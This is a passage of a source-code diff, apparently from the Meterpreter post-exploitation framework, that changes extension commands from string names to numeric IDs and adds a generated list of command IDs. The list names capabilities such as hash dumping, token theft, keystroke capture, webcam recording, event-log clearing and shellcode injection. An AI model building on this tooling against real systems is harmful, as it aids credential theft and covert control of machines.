+	COMMAND_REQ( COMMAND_ID_INCOGNITO_ADD_GROUP_USER, request_incognito_add_group_user ),
-	COMMAND_REQ( "incognito_add_localgroup_user", request_incognito_add_localgroup_user ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER, request_incognito_add_localgroup_user ),
-	COMMAND_REQ( "incognito_snarf_hashes", request_incognito_snarf_hashes ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_SNARF_HASHES, request_incognito_snarf_hashes ),
 	COMMAND_TERMINATOR
 };
 
@@ -238,15 +238,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "incognito", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/kiwi/main.c

@@ -26,7 +26,7 @@ DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet);
 /*! @brief The enabled commands for this extension. */
 Command customCommands[] =
 {
-    COMMAND_REQ("kiwi_exec_cmd", request_exec_cmd),
+    COMMAND_REQ(COMMAND_ID_KIWI_EXEC_CMD, request_exec_cmd),
     COMMAND_TERMINATOR
 };
 
@@ -104,15 +104,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "kiwi", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/lanattacks/lanattacks.c

@@ -160,15 +160,15 @@ DWORD request_lanattacks_stop_tftp(Remote *remote, Packet *packet)
 
 Command customCommands[] =
 {
-	COMMAND_REQ("lanattacks_start_dhcp", request_lanattacks_start_dhcp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_START_DHCP, request_lanattacks_start_dhcp),
-	COMMAND_REQ("lanattacks_reset_dhcp", request_lanattacks_reset_dhcp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_RESET_DHCP, request_lanattacks_reset_dhcp),
-	COMMAND_REQ("lanattacks_set_dhcp_option", request_lanattacks_set_dhcp_option),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_SET_DHCP_OPTION, request_lanattacks_set_dhcp_option),
-	COMMAND_REQ("lanattacks_stop_dhcp", request_lanattacks_stop_dhcp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_STOP_DHCP, request_lanattacks_stop_dhcp),
-	COMMAND_REQ("lanattacks_dhcp_log", request_lanattacks_dhcp_log),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_DHCP_LOG, request_lanattacks_dhcp_log),
-	COMMAND_REQ("lanattacks_start_tftp", request_lanattacks_start_tftp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_START_TFTP, request_lanattacks_start_tftp),
-	COMMAND_REQ("lanattacks_reset_tftp", request_lanattacks_stop_tftp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_RESET_TFTP, request_lanattacks_stop_tftp),
-	COMMAND_REQ("lanattacks_add_tftp_file", request_lanattacks_add_tftp_file),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_ADD_TFTP_FILE, request_lanattacks_add_tftp_file),
-	COMMAND_REQ("lanattacks_stop_tftp", request_lanattacks_stop_tftp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_STOP_TFTP, request_lanattacks_stop_tftp),
 	COMMAND_TERMINATOR
 };
 
@@ -212,15 +212,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote* remote)
 
 	return ERROR_SUCCESS;
 }
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "lanattacks", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/mimikatz/main.cpp

@@ -86,7 +86,7 @@ extern "C"
 
 	Command customCommands[] =
 	{
-		COMMAND_REQ("mimikatz_custom_command", request_custom_command),
+		COMMAND_REQ(COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND, request_custom_command),
 		COMMAND_TERMINATOR
 	};
 
@@ -116,16 +116,4 @@ extern "C"
 
 		return ERROR_SUCCESS;
 	}
-
-	/*!
-	 * @brief Get the name of the extension.
-	 * @param buffer Pointer to the buffer to write the name to.
-	 * @param bufferSize Size of the \c buffer parameter.
-	 * @return Indication of success or failure.
-	 */
-	DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-	{
-		strncpy_s(buffer, bufferSize, "mimikatz", bufferSize - 1);
-		return ERROR_SUCCESS;
-	}
 }

c/meterpreter/source/extensions/peinjector/peinjector.c

@@ -14,7 +14,7 @@ MetApi* met_api = NULL;
 
 Command customCommands[] =
 {
-	COMMAND_REQ("peinjector_inject_shellcode", request_peinjector_inject_shellcode),
+	COMMAND_REQ(COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE, request_peinjector_inject_shellcode),
 	COMMAND_TERMINATOR
 };
 
@@ -44,16 +44,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 
 	return ERROR_SUCCESS;
 }
-
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "peinjector", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/powershell/powershell.c

@@ -18,10 +18,10 @@ static BOOL gSuccessfullyLoaded = FALSE;
 /*! @brief List of commands that the powershell extension provides. */
 Command customCommands[] =
 {
-	COMMAND_REQ("powershell_execute", request_powershell_execute),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_EXECUTE, request_powershell_execute),
-	COMMAND_REQ("powershell_shell", request_powershell_shell),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_SHELL, request_powershell_shell),
-	COMMAND_REQ("powershell_assembly_load", request_powershell_assembly_load),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD, request_powershell_assembly_load),
-	COMMAND_REQ("powershell_session_remove", request_powershell_session_remove),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_SESSION_REMOVE, request_powershell_session_remove),
 	COMMAND_TERMINATOR
 };
 
@@ -60,26 +60,20 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
 	return ERROR_SUCCESS;
 }
 
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "powershell", bufferSize - 1);
-	return ERROR_SUCCESS;
-}
-
 /*!
  * @brief Do a stageless initialisation of the extension.
+ * @param extensionId ID of the extension that the init was intended for.
  * @param buffer Pointer to the buffer that contains the init data.
  * @param bufferSize Size of the \c buffer parameter.
  * @return Indication of success or failure.
  */
-DWORD __declspec(dllexport) StagelessInit(const LPBYTE buffer, DWORD bufferSize)
+DWORD __declspec(dllexport) StagelessInit(UINT extensionId, const LPBYTE buffer, DWORD bufferSize)
 {
-	dprintf("[PSH] Executing stagless script:\n%s", (LPCSTR)buffer);
+    if (extensionId == EXTENSION_ID_POWERSHELL)
-	return invoke_startup_script((LPCSTR)buffer);
+    {
+        dprintf("[PSH] Executing stagless script:\n%s", (LPCSTR)buffer);
+        invoke_startup_script((LPCSTR)buffer);
+        dprintf("[PSH] Execution of scrip complete");
+    }
+    return ERROR_SUCCESS;
 }

c/meterpreter/source/extensions/powershell/powershell_bindings.cpp

@@ -25,6 +25,8 @@ VOID MeterpreterInvoke(unsigned int isLocal, unsigned char* input, unsigned int
 	dprintf("[PSH BINDING] Packet header type:    %u", packet.header.type);
 	dprintf("[PSH BINDING] Packet payload length: %u", packet.payloadLength);
 	dprintf("[PSH BINDING] Packet local flag:     %u", isLocal);
+	dprintf("[PSH BINDING] Request ID:            %s", met_api->packet.get_tlv_value_string(&packet, TLV_TYPE_REQUEST_ID));
+	dprintf("[PSH BINDING] Command ID:            %u", met_api->packet.get_tlv_value_uint(&packet, TLV_TYPE_COMMAND_ID));
 
 	met_api->command.handle(gRemote, &packet);
 
@@ -35,7 +37,9 @@ VOID MeterpreterInvoke(unsigned int isLocal, unsigned char* input, unsigned int
 		*output = (unsigned char*)LocalAlloc(LPTR, packet.partner->payloadLength);
 		*outputLength = packet.partner->payloadLength;
 		memcpy(*output, packet.partner->payload, packet.partner->payloadLength);
+		dprintf("[PSH BINDING] Partner packet copied");
 		met_api->packet.destroy(packet.partner);
+		dprintf("[PSH BINDING] Partner packet destroyed");
 	}
 	else
 	{
@@ -43,4 +47,5 @@ VOID MeterpreterInvoke(unsigned int isLocal, unsigned char* input, unsigned int
 		*output = NULL;
 		*outputLength = 0;
 	}
+	dprintf("[PSH BINDING] MeterpreterInvoke done.");
 }

c/meterpreter/source/extensions/powershell/powershell_bridge.cpp

@@ -452,13 +452,13 @@ DWORD powershell_channel_interact_notify(Remote *remote, LPVOID entryContext, LP
 {
 	Channel *channel = (Channel*)entryContext;
 	InteractiveShell* shell = (InteractiveShell*)threadContext;
-	DWORD byteCount = shell->output.length() + 1;
+	DWORD byteCount = (shell->output.length() + 1) * sizeof(wchar_t);
 
 	if (shell->output.length() > 1 && shell->wait_handle != NULL)
 	{
 		met_api->lock.acquire(shell->buffer_lock);
-		dprintf("[PSH SHELL] received notification to write");
+		dprintf("[PSH SHELL] received notification to write %S", (wchar_t*)shell->output);
-		DWORD result = met_api->channel.write(channel, remote, NULL, 0, (PUCHAR)(char*)shell->output, byteCount, NULL);
+		DWORD result = met_api->channel.write(channel, remote, NULL, 0, (PUCHAR)(wchar_t*)shell->output, byteCount, NULL);
 		shell->output = "";
 		ResetEvent(shell->wait_handle);
 		met_api->lock.release(shell->buffer_lock);

c/meterpreter/source/extensions/powershell/powershell_runner.h

@@ -1,12 +1,12 @@
 /*!
   * @file powershell_runner.h
-  * @brief This file is generated, do not modify directly.
+  * @brief This file was generated at 05/08/2020 07:16:29 UTC, do not modify directly.
   */
 
  #ifndef _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H
  #define _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H
 
- #define PSHRUNNER_DLL_LEN 58880
+ #define PSHRUNNER_DLL_LEN 64512
 
  extern unsigned char PowerShellRunnerDll[PSHRUNNER_DLL_LEN];
 

c/meterpreter/source/extensions/priv/priv.c

@@ -14,14 +14,14 @@ MetApi* met_api = NULL;
  */
 Command customCommands[] =
 {
-	COMMAND_REQ( "priv_elevate_getsystem", elevate_getsystem ),
+    COMMAND_REQ(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM, elevate_getsystem),
-	COMMAND_REQ( "priv_passwd_get_sam_hashes", request_passwd_get_sam_hashes ),
+    COMMAND_REQ(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES, request_passwd_get_sam_hashes),
-	COMMAND_REQ( "priv_fs_get_file_mace", request_fs_get_file_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_GET_FILE_MACE, request_fs_get_file_mace),
-	COMMAND_REQ( "priv_fs_set_file_mace", request_fs_set_file_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_SET_FILE_MACE, request_fs_set_file_mace),
-	COMMAND_REQ( "priv_fs_set_file_mace_from_file", request_fs_set_file_mace_from_file ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE, request_fs_set_file_mace_from_file),
-	COMMAND_REQ( "priv_fs_blank_file_mace", request_fs_blank_file_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_BLANK_FILE_MACE, request_fs_blank_file_mace),
-	COMMAND_REQ( "priv_fs_blank_directory_mace", request_fs_blank_directory_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE, request_fs_blank_directory_mace),
-	COMMAND_TERMINATOR
+    COMMAND_TERMINATOR
 };
 
 /*!
@@ -50,16 +50,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote* remote)
 
     return ERROR_SUCCESS;
 }
-
-
-/*!
- * @brief Get the name of the extension.
- * @param buffer Pointer to the buffer to write the name to.
- * @param bufferSize Size of the \c buffer parameter.
- * @return Indication of success or failure.
- */
-DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
-{
-	strncpy_s(buffer, bufferSize, "priv", bufferSize - 1);
-	return ERROR_SUCCESS;
-}

c/meterpreter/source/extensions/python/Lib/meterpreter/__init__.py

@@ -1,2 +1,2 @@
-__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito', 'transport']
+__all__ = ['core', 'command', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito', 'transport']
 

c/meterpreter/source/extensions/python/Lib/meterpreter/command.py

@@ -0,0 +1,210 @@
+# ---------------------------------------------------------------
+# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-04-27 04:07:07 UTC
+
+COMMAND_ID_CORE_CHANNEL_CLOSE = 1
+COMMAND_ID_CORE_CHANNEL_EOF = 2
+COMMAND_ID_CORE_CHANNEL_INTERACT = 3
+COMMAND_ID_CORE_CHANNEL_OPEN = 4
+COMMAND_ID_CORE_CHANNEL_READ = 5
+COMMAND_ID_CORE_CHANNEL_SEEK = 6
+COMMAND_ID_CORE_CHANNEL_TELL = 7
+COMMAND_ID_CORE_CHANNEL_WRITE = 8
+COMMAND_ID_CORE_CONSOLE_WRITE = 9
+COMMAND_ID_CORE_ENUMEXTCMD = 10
+COMMAND_ID_CORE_GET_SESSION_GUID = 11
+COMMAND_ID_CORE_LOADLIB = 12
+COMMAND_ID_CORE_MACHINE_ID = 13
+COMMAND_ID_CORE_MIGRATE = 14
+COMMAND_ID_CORE_NATIVE_ARCH = 15
+COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION = 16
+COMMAND_ID_CORE_PATCH_URL = 17
+COMMAND_ID_CORE_PIVOT_ADD = 18
+COMMAND_ID_CORE_PIVOT_REMOVE = 19
+COMMAND_ID_CORE_PIVOT_SESSION_DIED = 20
+COMMAND_ID_CORE_SET_SESSION_GUID = 21
+COMMAND_ID_CORE_SET_UUID = 22
+COMMAND_ID_CORE_SHUTDOWN = 23
+COMMAND_ID_CORE_TRANSPORT_ADD = 24
+COMMAND_ID_CORE_TRANSPORT_CHANGE = 25
+COMMAND_ID_CORE_TRANSPORT_GETCERTHASH = 26
+COMMAND_ID_CORE_TRANSPORT_LIST = 27
+COMMAND_ID_CORE_TRANSPORT_NEXT = 28
+COMMAND_ID_CORE_TRANSPORT_PREV = 29
+COMMAND_ID_CORE_TRANSPORT_REMOVE = 30
+COMMAND_ID_CORE_TRANSPORT_SETCERTHASH = 31
+COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS = 32
+COMMAND_ID_CORE_TRANSPORT_SLEEP = 33
+COMMAND_ID_STDAPI_FS_CHDIR = 1001
+COMMAND_ID_STDAPI_FS_CHMOD = 1002
+COMMAND_ID_STDAPI_FS_DELETE_DIR = 1003
+COMMAND_ID_STDAPI_FS_DELETE_FILE = 1004
+COMMAND_ID_STDAPI_FS_FILE_COPY = 1005
+COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH = 1006
+COMMAND_ID_STDAPI_FS_FILE_MOVE = 1007
+COMMAND_ID_STDAPI_FS_GETWD = 1008
+COMMAND_ID_STDAPI_FS_LS = 1009
+COMMAND_ID_STDAPI_FS_MD5 = 1010
+COMMAND_ID_STDAPI_FS_MKDIR = 1011
+COMMAND_ID_STDAPI_FS_MOUNT_SHOW = 1012
+COMMAND_ID_STDAPI_FS_SEARCH = 1013
+COMMAND_ID_STDAPI_FS_SEPARATOR = 1014
+COMMAND_ID_STDAPI_FS_SHA1 = 1015
+COMMAND_ID_STDAPI_FS_STAT = 1016
+COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE = 1017
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE = 1018
+COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES = 1019
+COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT = 1020
+COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY = 1021
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES = 1022
+COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE = 1023
+COMMAND_ID_STDAPI_NET_RESOLVE_HOST = 1024
+COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS = 1025
+COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN = 1026
+COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN = 1027
+COMMAND_ID_STDAPI_RAILGUN_API = 1028
+COMMAND_ID_STDAPI_RAILGUN_API_MULTI = 1029
+COMMAND_ID_STDAPI_RAILGUN_MEMREAD = 1030
+COMMAND_ID_STDAPI_RAILGUN_MEMWRITE = 1031
+COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS = 1032
+COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY = 1033
+COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY = 1034
+COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY = 1035
+COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE = 1036
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY = 1037
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT = 1038
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE = 1039
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT = 1040
+COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY = 1041
+COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY = 1042
+COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY = 1043
+COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS = 1044
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE = 1045
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT = 1046
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE = 1047
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT = 1048
+COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY = 1049
+COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST = 1050
+COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN = 1051
+COMMAND_ID_STDAPI_SYS_CONFIG_GETENV = 1052
+COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS = 1053
+COMMAND_ID_STDAPI_SYS_CONFIG_GETSID = 1054
+COMMAND_ID_STDAPI_SYS_CONFIG_GETUID = 1055
+COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME = 1056
+COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF = 1057
+COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN = 1058
+COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO = 1059
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR = 1060
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE = 1061
+COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS = 1062
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST = 1063
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN = 1064
+COMMAND_ID_STDAPI_SYS_EVENTLOG_READ = 1065
+COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS = 1066
+COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH = 1067
+COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE = 1068
+COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE = 1069
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO = 1070
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES = 1071
+COMMAND_ID_STDAPI_SYS_PROCESS_GETPID = 1072
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES = 1073
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = 1074
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD = 1075
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD = 1076
+COMMAND_ID_STDAPI_SYS_PROCESS_KILL = 1077
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE = 1078
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE = 1079
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK = 1080
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT = 1081
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY = 1082
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ = 1083
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK = 1084
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE = 1085
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE = 1086
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE = 1087
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS = 1088
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN = 1089
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS = 1090
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME = 1091
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS = 1092
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND = 1093
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE = 1094
+COMMAND_ID_STDAPI_SYS_PROCESS_WAIT = 1095
+COMMAND_ID_STDAPI_UI_DESKTOP_ENUM = 1096
+COMMAND_ID_STDAPI_UI_DESKTOP_GET = 1097
+COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT = 1098
+COMMAND_ID_STDAPI_UI_DESKTOP_SET = 1099
+COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD = 1100
+COMMAND_ID_STDAPI_UI_ENABLE_MOUSE = 1101
+COMMAND_ID_STDAPI_UI_GET_IDLE_TIME = 1102
+COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 = 1103
+COMMAND_ID_STDAPI_UI_SEND_KEYEVENT = 1104
+COMMAND_ID_STDAPI_UI_SEND_KEYS = 1105
+COMMAND_ID_STDAPI_UI_SEND_MOUSE = 1106
+COMMAND_ID_STDAPI_UI_START_KEYSCAN = 1107
+COMMAND_ID_STDAPI_UI_STOP_KEYSCAN = 1108
+COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP = 1109
+COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD = 1110
+COMMAND_ID_STDAPI_WEBCAM_GET_FRAME = 1111
+COMMAND_ID_STDAPI_WEBCAM_LIST = 1112
+COMMAND_ID_STDAPI_WEBCAM_START = 1113
+COMMAND_ID_STDAPI_WEBCAM_STOP = 1114
+COMMAND_ID_PRIV_ELEVATE_GETSYSTEM = 2001
+COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE = 2002
+COMMAND_ID_PRIV_FS_BLANK_FILE_MACE = 2003
+COMMAND_ID_PRIV_FS_GET_FILE_MACE = 2004
+COMMAND_ID_PRIV_FS_SET_FILE_MACE = 2005
+COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = 2006
+COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES = 2007
+COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY = 3001
+COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA = 3002
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP = 3003
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE = 3004
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE = 3005
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = 3006
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START = 3007
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP = 3008
+COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA = 3009
+COMMAND_ID_EXTAPI_NTDS_PARSE = 3010
+COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY = 3011
+COMMAND_ID_EXTAPI_SERVICE_CONTROL = 3012
+COMMAND_ID_EXTAPI_SERVICE_ENUM = 3013
+COMMAND_ID_EXTAPI_SERVICE_QUERY = 3014
+COMMAND_ID_EXTAPI_WINDOW_ENUM = 3015
+COMMAND_ID_EXTAPI_WMI_QUERY = 3016
+COMMAND_ID_SNIFFER_CAPTURE_DUMP = 4001
+COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = 4002
+COMMAND_ID_SNIFFER_CAPTURE_RELEASE = 4003
+COMMAND_ID_SNIFFER_CAPTURE_START = 4004
+COMMAND_ID_SNIFFER_CAPTURE_STATS = 4005
+COMMAND_ID_SNIFFER_CAPTURE_STOP = 4006
+COMMAND_ID_SNIFFER_INTERFACES = 4007
+COMMAND_ID_WINPMEM_DUMP_RAM = 7001
+COMMAND_ID_KIWI_EXEC_CMD = 8001
+COMMAND_ID_UNHOOK_PE = 10001
+COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = 11001
+COMMAND_ID_INCOGNITO_ADD_GROUP_USER = 12001
+COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = 12002
+COMMAND_ID_INCOGNITO_ADD_USER = 12003
+COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN = 12004
+COMMAND_ID_INCOGNITO_LIST_TOKENS = 12005
+COMMAND_ID_INCOGNITO_SNARF_HASHES = 12006
+COMMAND_ID_PYTHON_EXECUTE = 13001
+COMMAND_ID_PYTHON_RESET = 13002
+COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD = 14001
+COMMAND_ID_POWERSHELL_EXECUTE = 14002
+COMMAND_ID_POWERSHELL_SESSION_REMOVE = 14003
+COMMAND_ID_POWERSHELL_SHELL = 14004
+COMMAND_ID_LANATTACKS_ADD_TFTP_FILE = 15001
+COMMAND_ID_LANATTACKS_DHCP_LOG = 15002
+COMMAND_ID_LANATTACKS_RESET_DHCP = 15003
+COMMAND_ID_LANATTACKS_RESET_TFTP = 15004
+COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = 15005
+COMMAND_ID_LANATTACKS_START_DHCP = 15006
+COMMAND_ID_LANATTACKS_START_TFTP = 15007
+COMMAND_ID_LANATTACKS_STOP_DHCP = 15008
+COMMAND_ID_LANATTACKS_STOP_TFTP = 15009
+COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = 16001
+COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = 17001
+
+# ---------------------------------------------------------------
+

c/meterpreter/source/extensions/python/Lib/meterpreter/core.py

@@ -63,7 +63,7 @@ TLV_TEMP       = 60000
 # TLV Specific Types
 #
 TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
-TLV_TYPE_METHOD                = TLV_META_TYPE_STRING  | 1
+TLV_TYPE_COMMAND_ID            = TLV_META_TYPE_UINT    | 1
 TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
 TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
 TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4
@@ -197,19 +197,21 @@ def validate_binding(required):
   This function returns the correct binding name to call."""
 
   # assume all core commands are valid
-  if required[:5] == 'core_':
+  if required < 1000:
     required = 'meterpreter_core'
+  else:
+    required = 'command_{0}'.format(required)
 
   if not required in set(dir(meterpreter_bindings)):
-    raise Exception('Missing bindings: {0}'.format(required))
+    raise Exception('Missing bindings: {0} (is a dependent extension not yet loaded?)'.format(required))
 
   return required
 
-def invoke_meterpreter(method, is_local, tlv = ""):
+def invoke_meterpreter(command_id, is_local, tlv = ""):
-  binding = validate_binding(method)
+  binding = validate_binding(command_id)
 
   header = struct.pack('>I', PACKET_TYPE_REQUEST)
-  header += tlv_pack(TLV_TYPE_METHOD, method)
+  header += tlv_pack(TLV_TYPE_COMMAND_ID, command_id)
   header += tlv_pack(TLV_TYPE_REQUEST_ID, 0)
   # add a leading 4-byte "zero" for the xor-key, 16 byte null guid, 4 byte encryption flag
   req = '\x00' * 24

c/meterpreter/source/extensions/python/Lib/meterpreter/elevate.py

@@ -2,19 +2,20 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 # We only support technique 1 (as it's the only one that doesn't require DLLs)
 def getsystem():
